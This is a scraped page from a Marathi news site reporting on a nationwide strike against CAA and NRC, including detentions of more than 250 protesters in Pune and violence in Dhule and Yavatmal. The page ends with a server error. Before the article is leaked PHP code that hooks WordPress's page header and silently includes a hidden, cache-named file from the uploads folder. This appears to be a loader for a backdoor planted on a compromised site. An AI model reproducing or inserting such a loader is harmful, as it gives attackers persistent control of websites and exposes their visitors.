add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); CAA, NRC विरोधात आंदोलन करणारे २५० पेक्षा अधिकजण ताब्यात – SOCH INDIA
Menu

देश
CAA, NRC विरोधात आंदोलन करणारे २५० पेक्षा अधिकजण ताब्यात

nobanner

सुधारित नागरिकत्व कायदा (सीएए) व राष्ट्रीय नागरिक नोंदणी(एनआरसी) विरोधात बहुजन क्रांती मोर्चा, ट्रेड युनियन्ससह अन्य संघटनामार्फत आज भारत बंदचे आवाहन करण्यात आलेले आहे. या बंदला राज्यभरात संमिश्र प्रतिसाद मिळताना दिसत आहे. काही ठिकाणी एसटी बसवर दगडफेकही झाली आहे. तर, पुण्यात आंदोलन करणाऱ्या २५० पेक्षा अधिक जणांना पोलिसांनी ताब्यात घेतले आहे.

भारत बंदच्या पार्श्वभूमीवर पुण्यात ठिकठिकाणी बहुजन क्रांती मोर्चाच्या कार्यकर्त्यांकडून आंदोलन करण्यात आले. शहरातील सारसबागसमोर देखील रास्ता रोको करण्यात आला. मुंबईत बहुजन क्रांती मोर्चाच्या कार्यकर्त्यांनी मध्य रेल्वेच्या कांजूरमार्ग स्थानकावर रेल रोको आंदोलन केले. तर,यवतमाळ व धुळे येथे या बंदला हिंसक वळण लागल्याचे पाहायला मिळाले, धुळ्यात एसटी बसवर आंदोलकांकडून दगडफेक करण्यात आली. तर, यवतमाळ येथे पोलिसांकडून मोर्चेकऱ्यांवर बळाचा वापर केला. पालघरमध्ये देखील कायदा सुव्यवस्थेचा प्रश्न निर्माण झाल्याने पोलिसांनी शहरात मोठा बंदोबस्त तैनात केलेला आहे. औरंगाबादमध्ये आंदोलकांनी तिरंगा ध्वज हाती घेऊन रस्त्यावर उतरत बंदला प्रतिसाद दिला. औरंगाबाद जिल्ह्यात बंदला संमिश्र प्रतिसाद मिळाल्याचे दिसून आले.

भारत बंदच्या पार्श्वभूमीवर बहुजन क्रांती मोर्चाच्यावतीने व्यापारी, दुकानदारा आणि सर्वसामान्य नागरिकांना बंद पाळण्याचे आवाहन करण्यात आले होते. राज्यात काही ठिकाणी त्यांच्या या अहवानास प्रतिसाद मिळाला. तर काही ठिकाणी व्यापाऱ्यांनी या बंदला विरोध दर्शवला.अनेक व्यापारी संघटनांकडून स्थानिक पोलीस ठाणे व जिल्हाधिकारी कार्यालायांना निवेदन सादर करून बंदोबस्ताची मागणी केली.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.